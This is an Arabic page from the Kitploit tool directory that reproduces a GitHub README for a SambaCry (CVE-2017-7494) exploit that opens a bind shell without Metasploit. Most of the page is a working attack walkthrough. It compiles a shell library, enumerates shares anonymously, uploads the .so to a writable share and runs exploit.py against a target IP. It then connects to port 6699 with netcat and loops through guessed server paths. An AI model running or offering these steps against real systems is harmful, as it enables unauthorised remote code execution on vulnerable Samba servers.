Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-7494_SambaCry — SambaCry (CVE-2017-7494) استغلال لـ Samba | bind shell بدون Metasploit | Kitploit
أدوات/GitHubGitHub/d3fudd/cve-2017-7494_sambacry
تحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubd3fudd/cve-2017-7494_sambacry

CVE-2017-7494_SambaCry

SambaCry (CVE-2017-7494) استغلال لـ Samba | bind shell بدون Metasploit

عرض المستودع
7منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-7494 SambaCry Exploit

استغلال SambaCry (CVE-2017-7494) لاستغلال Samba (bind shell بدون Metasploit)

إذا احتجت إلى تغيير المنفذ، فقط قم بتغيير السطر 68 من bindshell-samba.c وأعد التجميع:
image

root@kitploit:~
gcc -c -fpic bindshell-samba.c
root@kitploit:~
gcc -shared -o libbindshell-samba.so bindshell-samba.o

كيفية الاستغلال:

انظر المشاركات (في هذا المثال نستخدم مستخدمًا مجهولًا):

root@kitploit:~
smbclient -L //192.168.10.131/ -U "" -N
root@kitploit:~
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	publico         Disk      Publico
	IPC$            IPC       IPC Service (maq131 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            CHORA

قم بالوصول إلى مجلد وتحقق مما إذا كان المستخدم لديه أذونات الكتابة:

root@kitploit:~
smbclient //192.168.10.131/publico -U "" -N

إذا كان لديك أذونات الكتابة، أرسل الملف libbindshell-samba.so

root@kitploit:~
smb: \> mput libbindshell-samba.so
root@kitploit:~
Put file libbindshell-samba.so? yes
putting file libbindshell-samba.so as \libbindshell-samba.so (3.5 kb/s) (average 3.5 kb/s)
smb: \> dir
  .                                   D        0  Tue Nov  1 19:44:15 2022
  ..                                  D        0  Wed Jun 14 14:16:35 2017
  libbindshell-samba.so               A     8432  Tue Nov  1 19:44:17 2022

		3997376 blocks of size 1024. 1960284 blocks available
smb: \>

بعد ذلك، قم بتشغيل الاستغلال:
python2 exploit.py -t target_ip -m path_absoluto_server_side

مثال:

root@kitploit:~
python2 exploit.py -t 192.168.10.131 -m /home/publico/libbindshell-samba.so

اتصل بالمنفذ 6699/TCP:

root@kitploit:~
nc -vn 192.168.10.131 6699

image

إذا كنت لا تعرف المسار المطلق على جانب الخادم، فمن المستحسن إجراء تخمين وانتظار فتح المنفذ 6699/TCP:

root@kitploit:~
for i in $(cat paths.txt);do python2 exploit.py -t 192.168.10.131 -m $i/publico/libbindshell-samba.so 2>/dev/null;done
تنزيل الأداة